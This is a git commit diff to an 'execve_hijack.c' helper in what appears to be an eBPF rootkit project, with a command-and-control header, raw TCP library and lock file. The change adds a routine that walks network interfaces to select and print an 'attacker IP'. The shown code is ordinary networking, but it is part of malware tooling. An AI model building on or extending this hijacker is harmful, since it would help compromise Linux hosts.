Updated some files for eveything to work now that it is all together. Execve hijacker and clients in particular

2025-12-20 00:33:07 +08:00 · 2022-05-15 20:47:58 -04:00
parent 4a292f0f7a
commit 78b3132687
57 changed files with 15420 additions and 15487 deletions
--- a/src/helpers/execve_hijack.c
+++ b/src/helpers/execve_hijack.c
@@ -1,3 +1,4 @@
+#define _GNU_SOURCE
 #include <stdio.h>
 #include <stdlib.h>
 #include <sys/types.h>
@@ -20,6 +21,8 @@
 #include <syslog.h>
 #include <dlfcn.h>
 #include <sys/timerfd.h>
+#include <ifaddrs.h>
+#include <linux/if_link.h>

 #include "lib/RawTCP.h"
 #include "../common/c&c.h"
@@ -28,6 +31,7 @@
 #include <bpf/libbpf.h>

 #define LOCK_FILE "/tmp/rootlog"
+#define DEFAULT_NETWORK_INTERFACE "enp0s3"

 int test_time_values_injection(){

@@ -86,11 +90,74 @@ char* execute_command(char* command){
 }    


+/**
+ * @brief Improved version of getting local IP
+ * Based on the man page: https://man7.org/linux/man-pages/man3/getifaddrs.3.html
+ * 
+ * @return char* 
+ */
 char* getLocalIpAddress(){
    char hostbuffer[256];
    char* IPbuffer = calloc(256, sizeof(char));
    struct hostent *host_entry;
    int hostname;
+        
+    struct ifaddrs *ifaddr;
+    int family, s;
+    char host[NI_MAXHOST];
+
+    if (getifaddrs(&ifaddr) == -1) {
+        perror("getifaddrs");
+        exit(EXIT_FAILURE);
+    }
+
+    /* Walk through linked list, maintaining head pointer so we
+        can free list later. */
+
+    for (struct ifaddrs *ifa = ifaddr; ifa != NULL;ifa = ifa->ifa_next) {
+        if (ifa->ifa_addr == NULL)
+            continue;
+
+        family = ifa->ifa_addr->sa_family;
+
+        /* Display interface name and family (including symbolic
+            form of the latter for the common families). */
+
+        //printf("%-8s %s (%d)\n",ifa->ifa_name,(family == AF_PACKET) ? "AF_PACKET" :(family == AF_INET) ? "AF_INET" :(family == AF_INET6) ? "AF_INET6" : "???",family);
+        /* For an AF_INET* interface address, display the address. */
+
+        if (family == AF_INET || family == AF_INET6) {
+            s = getnameinfo(ifa->ifa_addr,
+                    (family == AF_INET) ? sizeof(struct sockaddr_in) :
+                                            sizeof(struct sockaddr_in6),
+                    host, NI_MAXHOST,
+                    NULL, 0, NI_NUMERICHOST);
+            if (s != 0) {
+                printf("getnameinfo() failed: %s\n", gai_strerror(s));
+                exit(EXIT_FAILURE);
+            }
+
+            //printf("\t\taddress: <%s>\n", host);
+            if(strcmp(ifa->ifa_name, DEFAULT_NETWORK_INTERFACE)==0){
+                //Interface we chose
+                printf("Attacker IP selected: %s (%s)\n", ifa->ifa_name, host);
+                strcpy(IPbuffer, host);
+                return IPbuffer;
+            }
+        }
+        
+    }
+
+    freeifaddrs(ifaddr);
+
+    exit(-1);
+}
+
+char* getLocalIpAddress_old(){
+    char hostbuffer[256];
+    char* IPbuffer = calloc(256, sizeof(char));
+    struct hostent *host_entry;
+    int hostname;
  
    hostname = gethostname(hostbuffer, sizeof(hostbuffer));
    if(hostname==-1){